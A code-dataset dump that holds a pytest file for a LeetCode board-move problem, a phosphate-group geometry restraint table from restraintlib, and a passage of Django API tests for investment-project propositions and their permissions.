hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fc20295b0f2fbb194d3cfebd73f5427747f68b3d | 3,306 | py | Python | tests/test_1958.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | tests/test_1958.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | tests/test_1958.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import pytest
"""
Test 1958. Check if Move is Legal
"""
@pytest.fixture(scope="session")
def init_variables_1958():
from src.leetcode_1958_check_if_move_is_legal import Solution
solution = Solution()
def _init_variables_1958():
return solution
yield _init_variables_1958
class TestClass1958:
def test_solution_0(self, init_variables_1958):
assert init_variables_1958().checkMove(
[
[".", ".", ".", "B", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
["W", "B", "B", ".", "W", "W", "W", "B"],
[".", ".", ".", "B", ".", ".", ".", "."],
[".", ".", ".", "B", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
],
4,
3,
"B",
)
def test_solution_1(self, init_variables_1958):
assert not init_variables_1958().checkMove(
[
[".", ".", ".", ".", ".", ".", ".", "."],
[".", "B", ".", ".", "W", ".", ".", "."],
[".", ".", "W", ".", ".", ".", ".", "."],
[".", ".", ".", "W", "B", ".", ".", "."],
[".", ".", ".", ".", ".", ".", ".", "."],
[".", ".", ".", ".", "B", "W", ".", "."],
[".", ".", ".", ".", ".", ".", "W", "."],
[".", ".", ".", ".", ".", ".", ".", "B"],
],
4,
4,
"W",
)
#!/usr/bin/env python
import pytest
"""
Test 1958. Check if Move is Legal
"""
@pytest.fixture(scope="session")
def init_variables_1958():
from src.leetcode_1958_check_if_move_is_legal import Solution
solution = Solution()
def _init_variables_1958():
return solution
yield _init_variables_1958
class TestClass1958:
def test_solution_0(self, init_variables_1958):
assert init_variables_1958().checkMove(
[
[".", ".", ".", "B", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
["W", "B", "B", ".", "W", "W", "W", "B"],
[".", ".", ".", "B", ".", ".", ".", "."],
[".", ".", ".", "B", ".", ".", ".", "."],
[".", ".", ".", "W", ".", ".", ".", "."],
],
4,
3,
"B",
)
def test_solution_1(self, init_variables_1958):
assert not init_variables_1958().checkMove(
[
[".", ".", ".", ".", ".", ".", ".", "."],
[".", "B", ".", ".", "W", ".", ".", "."],
[".", ".", "W", ".", ".", ".", ".", "."],
[".", ".", ".", "W", "B", ".", ".", "."],
[".", ".", ".", ".", ".", ".", ".", "."],
[".", ".", ".", ".", "B", "W", ".", "."],
[".", ".", ".", ".", ".", ".", "W", "."],
[".", ".", ".", ".", ".", ".", ".", "B"],
],
4,
4,
"W",
)
| 29.256637 | 65 | 0.263158 | 204 | 3,306 | 4.009804 | 0.181373 | 0.03912 | 0.290954 | 0.02934 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.045098 | 0.38294 | 3,306 | 112 | 66 | 29.517857 | 0.355882 | 0.012099 | 0 | 0.902439 | 0 | 0 | 0.086109 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 1 | 0.097561 | false | 0 | 0.04878 | 0.02439 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fc22a90b90d10dc72ce7d79a211c9228703d994d | 10,167 | py | Python | restraintlib/lib/PO4.py | mkowiel/restraintlib | 32de01d67ae290a45f3199e90c729acc258a6249 | [
"BSD-3-Clause"
] | null | null | null | restraintlib/lib/PO4.py | mkowiel/restraintlib | 32de01d67ae290a45f3199e90c729acc258a6249 | [
"BSD-3-Clause"
] | 1 | 2021-11-11T18:45:10.000Z | 2021-11-11T18:45:10.000Z | restraintlib/lib/PO4.py | mkowiel/restraintlib | 32de01d67ae290a45f3199e90c729acc258a6249 | [
"BSD-3-Clause"
] | null | null | null |
PO4_PDB_CODES = ['A', 'C', 'G', 'T', 'U', 'DA', 'DC', 'DG', 'DT', 'DU', 'IC', 'IG']
PO4_ATOM_NAMES = {
'P': 'P',
'OP1': 'OP1',
'O1P': 'OP1',
'OP2': 'OP2',
'O2P': 'OP2',
"O5'": "O5'",
"O5*": "O5'",
"O3'": "O3'",
"O3*": "O3'",
"C5'": "C5'",
"C5*": "C5'",
"C3'": "C3'",
"C3*": "C3'",
}
PO4_ATOM_RES = {
'P': 0,
'OP1': 0,
'OP2': 0,
"O5'": 0,
"O3'": -1,
"C5'": 0,
"C3'": -1,
}
PO4_REQUIRED_CONDITION = {
("P", "O3'", 2.0, 0, -1),
("P", "O5'", 2.0, 0, 0),
("P", "OP1", 2.0, 0, 0),
("P", "OP2", 2.0, 0, 0),
("C3'", "O3'", 2.0, -1, -1),
("C5'", "O5'", 2.0, 0, 0),
}
PO4_DISTANCE_MEASURE = {
'measure': 'euclidean_angles',
'restraint_names': ['aO1O2', 'aO1O3', 'aO1O5', 'aO2O3', 'aO2O5', 'aO3O5']
}
PO4_CONDITION_DISTANCE_MEASURE = {
'measure': 'euclidean_angles',
'restraint_names': ['tC3O3P4O5', 'tC5O5P4O3']
}
PO4_RESTRAINTS = [
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -66.636, 7.779],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 171.37, 14.971]
],
"name": "PO4==AA_0",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
["angle", "aO1O3", ["OP1", "P", "O3'"], 106.2, 1.1],
["angle", "aO1O5", ["OP1", "P", "O5'"], 110.2, 1.3],
["angle", "aO2O3", ["OP2", "P", "O3'"], 112.2, 1.0],
["angle", "aO2O5", ["OP2", "P", "O5'"], 109.3, 0.9],
["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
["dist", "dO1P4", ["OP1", "P"], 1.487, 0.01],
["dist", "dO2P4", ["OP2", "P"], 1.483, 0.01],
["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
]
},
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 171.37, 14.971],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -66.636, 7.779]
],
"name": "PO4==AA_1",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
["angle", "aO1O3", ["OP1", "P", "O3'"], 109.3, 0.9],
["angle", "aO1O5", ["OP1", "P", "O5'"], 112.2, 1.0],
["angle", "aO2O3", ["OP2", "P", "O3'"], 110.2, 1.3],
["angle", "aO2O5", ["OP2", "P", "O5'"], 106.2, 1.1],
["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
["dist", "dO1P4", ["OP1", "P"], 1.483, 0.01],
["dist", "dO2P4", ["OP2", "P"], 1.487, 0.01],
["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
]
},
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -171.37, 14.971],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 66.636, 7.779]
],
"name": "PO4==AA_2",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
["angle", "aO1O3", ["OP1", "P", "O3'"], 110.2, 1.3],
["angle", "aO1O5", ["OP1", "P", "O5'"], 106.2, 1.1],
["angle", "aO2O3", ["OP2", "P", "O3'"], 109.3, 0.9],
["angle", "aO2O5", ["OP2", "P", "O5'"], 112.2, 1.0],
["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
["dist", "dO1P4", ["OP1", "P"], 1.487, 0.01],
["dist", "dO2P4", ["OP2", "P"], 1.483, 0.01],
["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
]
},
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 66.636, 7.779],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -171.37, 14.971]
],
"name": "PO4==AA_3",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
["angle", "aO1O3", ["OP1", "P", "O3'"], 112.2, 1.0],
["angle", "aO1O5", ["OP1", "P", "O5'"], 109.3, 0.9],
["angle", "aO2O3", ["OP2", "P", "O3'"], 106.2, 1.1],
["angle", "aO2O5", ["OP2", "P", "O5'"], 110.2, 1.3],
["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
["dist", "dO1P4", ["OP1", "P"], 1.483, 0.01],
["dist", "dO2P4", ["OP2", "P"], 1.487, 0.01],
["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
]
},
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -69.896, 9.625],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -68.72, 8.686]
],
"name": "PO4==AS_0",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
["angle", "aO1O3", ["OP1", "P", "O3'"], 104.5, 0.9],
["angle", "aO1O5", ["OP1", "P", "O5'"], 110.3, 0.8],
["angle", "aO2O3", ["OP2", "P", "O3'"], 111.5, 1.1],
["angle", "aO2O5", ["OP2", "P", "O5'"], 105.2, 0.8],
["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
["dist", "dO1P4", ["OP1", "P"], 1.484, 0.012],
["dist", "dO2P4", ["OP2", "P"], 1.478, 0.01],
["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
]
},
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -68.72, 8.686],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -69.896, 9.625]
],
"name": "PO4==AS_1",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
["angle", "aO1O3", ["OP1", "P", "O3'"], 105.2, 0.8],
["angle", "aO1O5", ["OP1", "P", "O5'"], 111.5, 1.1],
["angle", "aO2O3", ["OP2", "P", "O3'"], 110.3, 0.8],
["angle", "aO2O5", ["OP2", "P", "O5'"], 104.5, 0.9],
["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
["dist", "dO1P4", ["OP1", "P"], 1.478, 0.01],
["dist", "dO2P4", ["OP2", "P"], 1.484, 0.012],
["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
]
},
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 68.72, 8.686],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 69.896, 9.625]
],
"name": "PO4==AS_2",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
["angle", "aO1O3", ["OP1", "P", "O3'"], 110.3, 0.8],
["angle", "aO1O5", ["OP1", "P", "O5'"], 104.5, 0.9],
["angle", "aO2O3", ["OP2", "P", "O3'"], 105.2, 0.8],
["angle", "aO2O5", ["OP2", "P", "O5'"], 111.5, 1.1],
["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
["dist", "dO1P4", ["OP1", "P"], 1.484, 0.012],
["dist", "dO2P4", ["OP2", "P"], 1.478, 0.01],
["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
]
},
{
"conditions": [
["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 69.896, 9.625],
["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 68.72, 8.686]
],
"name": "PO4==AS_3",
"restraints": [
["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
["angle", "aO1O3", ["OP1", "P", "O3'"], 111.5, 1.1],
["angle", "aO1O5", ["OP1", "P", "O5'"], 105.2, 0.8],
["angle", "aO2O3", ["OP2", "P", "O3'"], 104.5, 0.9],
["angle", "aO2O5", ["OP2", "P", "O5'"], 110.3, 0.8],
["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
["dist", "dO1P4", ["OP1", "P"], 1.478, 0.01],
["dist", "dO2P4", ["OP2", "P"], 1.484, 0.012],
["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
]
}
]
| 43.26383 | 83 | 0.349562 | 1,295 | 10,167 | 2.724324 | 0.088031 | 0.034864 | 0.022676 | 0.063492 | 0.927438 | 0.910998 | 0.90873 | 0.729025 | 0.729025 | 0.729025 | 0 | 0.220017 | 0.306187 | 10,167 | 234 | 84 | 43.448718 | 0.280125 | 0 | 0 | 0.46696 | 0 | 0 | 0.267559 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fc24b479a0baafd8d1cb1e42bd8123cb5b0d2696 | 93,292 | py | Python | datahub/investment/project/proposition/test/test_views.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 6 | 2019-12-02T16:11:24.000Z | 2022-03-18T10:02:02.000Z | datahub/investment/project/proposition/test/test_views.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 1,696 | 2019-10-31T14:08:37.000Z | 2022-03-29T12:35:57.000Z | datahub/investment/project/proposition/test/test_views.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 9 | 2019-11-22T12:42:03.000Z | 2021-09-03T14:25:05.000Z | import datetime
import uuid
from unittest.mock import patch
import factory
import pytest
from django.utils.timezone import utc
from freezegun import freeze_time
from rest_framework import status
from rest_framework.reverse import reverse
from datahub.company.test.factories import AdviserFactory
from datahub.core.test_utils import APITestMixin, create_test_user, format_date_or_datetime
from datahub.documents.models import Document, UploadStatus
from datahub.investment.project.proposition.constants import PropositionStatus
from datahub.investment.project.proposition.models import (
Proposition,
PropositionDocument,
PropositionDocumentPermission,
PropositionPermission,
)
from datahub.investment.project.proposition.test.factories import PropositionFactory
from datahub.investment.project.test.factories import InvestmentProjectFactory
from datahub.metadata.test.factories import TeamFactory
from datahub.user_event_log.constants import UserEventType
from datahub.user_event_log.models import UserEvent
NON_RESTRICTED_VIEW_PERMISSIONS = (
(
PropositionPermission.view_all,
PropositionDocumentPermission.view_all,
),
(
PropositionPermission.view_all,
PropositionDocumentPermission.view_all,
PropositionPermission.view_associated,
PropositionDocumentPermission.view_associated,
),
)
NON_RESTRICTED_ADD_PERMISSIONS = (
(
PropositionPermission.add_all,
PropositionDocumentPermission.add_all,
),
(
PropositionPermission.add_all,
PropositionDocumentPermission.add_all,
PropositionPermission.add_associated,
PropositionDocumentPermission.add_associated,
),
)
NON_RESTRICTED_CHANGE_PERMISSIONS = (
(
PropositionPermission.change_all,
PropositionDocumentPermission.change_all,
),
(
PropositionPermission.change_all,
PropositionDocumentPermission.change_all,
PropositionPermission.change_associated,
PropositionDocumentPermission.change_associated,
),
)
NON_RESTRICTED_DELETE_PERMISSIONS = (
(
PropositionPermission.delete_all,
PropositionDocumentPermission.delete_all,
),
(
PropositionPermission.delete_all,
PropositionDocumentPermission.delete_all,
PropositionDocumentPermission.delete_associated,
),
)
class TestCreateProposition(APITestMixin):
"""Tests for the create proposition view."""
@pytest.mark.parametrize('permissions', NON_RESTRICTED_ADD_PERMISSIONS)
def test_can_create_proposition(self, permissions):
"""Test creating proposition."""
investment_project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
adviser = create_test_user(
permission_codenames=permissions,
)
api_client = self.create_api_client(user=adviser)
response = api_client.post(
url,
{
'name': 'My proposition.',
'scope': 'Very broad scope.',
'adviser': adviser.pk,
'deadline': '2018-02-10',
},
)
assert response.status_code == status.HTTP_201_CREATED
response_data = response.json()
instance = Proposition.objects.get(pk=response_data['id'])
assert instance.created_by == adviser
assert instance.modified_by == adviser
assert response_data == {
'id': str(instance.pk),
'investment_project': {
'name': investment_project.name,
'project_code': investment_project.project_code,
'id': str(investment_project.pk),
},
'adviser': {
'first_name': adviser.first_name,
'last_name': adviser.last_name,
'name': adviser.name,
'id': str(adviser.pk),
},
'deadline': '2018-02-10',
'status': PropositionStatus.ONGOING,
'name': 'My proposition.',
'scope': 'Very broad scope.',
'details': '',
'created_on': format_date_or_datetime(instance.created_on),
'created_by': {
'first_name': instance.created_by.first_name,
'last_name': instance.created_by.last_name,
'name': instance.created_by.name,
'id': str(instance.created_by.pk),
},
'modified_by': {
'first_name': instance.modified_by.first_name,
'last_name': instance.modified_by.last_name,
'name': instance.modified_by.name,
'id': str(instance.modified_by.pk),
},
'modified_on': format_date_or_datetime(instance.modified_on),
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_ADD_PERMISSIONS)
def test_cannot_create_proposition_for_non_existent_investment_project(self, permissions):
"""Test user cannot create proposition for non existent investment project."""
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': uuid.uuid4(),
},
)
adviser = create_test_user(
permission_codenames=permissions,
)
api_client = self.create_api_client(user=adviser)
response = api_client.post(
url,
{
'name': 'My proposition.',
'scope': 'Very broad scope.',
'adviser': adviser.pk,
'deadline': '2018-02-10',
},
)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
def test_restricted_user_can_create_associated_investment_project_proposition(self):
"""Test restricted user can create associated invesment project proposition."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(created_by=project_creator)
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
adviser = create_test_user(
permission_codenames=[PropositionPermission.add_associated],
dit_team=project_creator.dit_team,
)
api_client = self.create_api_client(user=adviser)
response = api_client.post(
url,
{
'name': 'My proposition.',
'scope': 'Very broad scope.',
'adviser': adviser.pk,
'deadline': '2018-02-10',
},
)
assert response.status_code == status.HTTP_201_CREATED
response_data = response.json()
instance = Proposition.objects.get(pk=response_data['id'])
assert instance.created_by == adviser
assert instance.modified_by == adviser
assert response_data == {
'id': str(instance.pk),
'investment_project': {
'name': investment_project.name,
'project_code': investment_project.project_code,
'id': str(investment_project.pk),
},
'adviser': {
'first_name': adviser.first_name,
'last_name': adviser.last_name,
'name': adviser.name,
'id': str(adviser.pk),
},
'deadline': '2018-02-10',
'status': PropositionStatus.ONGOING,
'name': 'My proposition.',
'scope': 'Very broad scope.',
'details': '',
'created_on': format_date_or_datetime(instance.created_on),
'created_by': {
'first_name': instance.created_by.first_name,
'last_name': instance.created_by.last_name,
'name': instance.created_by.name,
'id': str(instance.created_by.pk),
},
'modified_by': {
'first_name': instance.modified_by.first_name,
'last_name': instance.modified_by.last_name,
'name': instance.modified_by.name,
'id': str(instance.modified_by.pk),
},
'modified_on': format_date_or_datetime(instance.modified_on),
}
def test_restricted_user_cannot_create_non_associated_investment_project_proposition(self):
"""Test restricted user cannot create non associated invesment project proposition."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(created_by=project_creator)
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
adviser = create_test_user(
permission_codenames=[PropositionPermission.add_associated],
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=adviser)
response = api_client.post(
url,
{
'name': 'My proposition.',
'scope': 'Very broad scope.',
'adviser': adviser.pk,
'deadline': '2018-02-10',
},
)
response_data = response.json()
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
def test_cannot_created_with_fields_missing(self):
"""Test that proposition cannot be created without required fields."""
investment_project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
response = self.api_client.post(url, {})
assert response.status_code == status.HTTP_400_BAD_REQUEST
response_data = response.json()
assert response_data == {
'adviser': ['This field is required.'],
'deadline': ['This field is required.'],
'name': ['This field is required.'],
'scope': ['This field is required.'],
}
class TestUpdateProposition(APITestMixin):
"""Tests for the update proposition view."""
@pytest.mark.parametrize(
'method', ('put', 'patch'),
)
def test_cannot_update_collection(self, method):
"""Test cannot update proposition."""
investment_project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
response = getattr(self.api_client, method)(url)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
@pytest.mark.parametrize(
'method', ('put', 'patch'),
)
def test_cannot_update_item(self, method):
"""Test cannot update given proposition."""
proposition = PropositionFactory()
investment_project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': investment_project.pk,
},
)
response = getattr(self.api_client, method)(
url,
data={
'name': 'hello!',
},
)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
class TestListPropositions(APITestMixin):
"""Tests for the list propositions view."""
@pytest.mark.parametrize('api_version', ('v3', 'v4'))
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_non_restricted_user_can_list_propositions(self, permissions, api_version):
"""List of propositions by a non restricted user."""
investment_project = InvestmentProjectFactory()
PropositionFactory.create_batch(3)
propositions = PropositionFactory.create_batch(
